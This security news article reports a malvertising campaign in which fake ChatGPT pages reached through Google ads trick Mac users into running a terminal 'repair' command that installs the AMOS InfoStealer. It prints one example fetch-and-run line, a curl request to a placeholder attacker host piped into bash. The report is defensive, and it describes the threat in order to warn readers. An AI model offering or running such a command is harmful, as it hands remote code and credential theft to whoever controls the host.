Threat actors are leveraging the popularity of ChatGPT to distribute new malware, specifically targeting Mac devices with the AMOS InfoStealer. This sophisticated social engineering campaign tricks unsuspecting users into executing malicious commands by posing as a helpful AI assistant for troubleshooting common technical issues. Security researchers have identified that this method circumvents traditional security measures by appearing as a routine interaction within a trusted platform.
The attack begins when individuals search for solutions to problems, such as audio malfunctions on their Macs. Sponsored links leading to what appear to be legitimate ChatGPT interfaces are appearing at the top of search results, thanks to their placement through Google Ads. Once a user engages with the fake chat session, it provides a seemingly innocuous “repair” command and instructs the user to execute it directly within the macOS Terminal application.
The AMOS InfoStealer and Its Mac Device Exploitation
This novel approach by threat actors represents a significant shift in malware distribution tactics. Instead of relying on fake installer windows or overt phishing pages, the attackers blend social engineering with technical exploitation. The interaction a victim experiences feels like a normal support session, making it difficult to discern the malicious intent. Kroll security researchers were the first to identify this campaign and its deployment of the AMOS InfoStealer on targeted Mac endpoints.
The effectiveness of this attack is further amplified by the visual legitimacy of the domain displayed in the Google Ad, making it challenging for the average user to suspect any risk. The entire infiltration process requires only a single copy-paste action from the user into their terminal, demonstrating a streamlined and efficient method for compromising a system.
The implications of a successful AMOS InfoStealer infection are severe for both individual users and organizations. This type of malware is specifically designed to exfiltrate sensitive data from Mac devices. This includes crucial information such as browser history, login credentials, active session cookies, and other stored secrets. The stolen data can then be exploited for various malicious purposes, including account takeovers, lateral movement within a compromised network, or being sold on dark web marketplaces.
Infection Mechanism and Malicious Command Execution
Kroll analysts pinpointed a specific terminal command, provided by the simulated ChatGPT chat, as a key indicator of compromise within affected systems. This command instructs macOS to download and execute a script hosted remotely. This technique aligns with the MITRE ATT&CK framework, specifically utilizing methods like User Execution and Ingress Tool Transfer.
A typical command observed in these attacks follows a pattern similar to this: curl -s https://attacker-example[.]com/installer.sh | bash. When this single-line command is executed by the user, it discreetly downloads a shell script from a specified URL via HTTPS. The script is then executed directly within the same terminal session without any visible files being saved, making the process stealthy. The installed script can then covertly deploy the AMOS malware, establish persistence on the system, and initiate the exfiltration of sensitive data.
The ongoing development and adaptation of malware distribution techniques, particularly those that leverage widely trusted platforms like ChatGPT, highlight the ever-evolving threat landscape. Security professionals are closely monitoring the proliferation of such attacks and are advising users to exercise extreme caution when encountering unsolicited technical support or commands, especially when sourced through search engine advertisements.
The discovery of this campaign underscores the importance of robust cybersecurity practices, including user education and the implementation of advanced threat detection solutions. As attackers continue to find innovative ways to exploit user trust and popular technologies, staying informed and vigilant is crucial for safeguarding digital assets. Further analysis is expected to reveal the full scope of this AMOS InfoStealer campaign and the specific variants of the malware being deployed.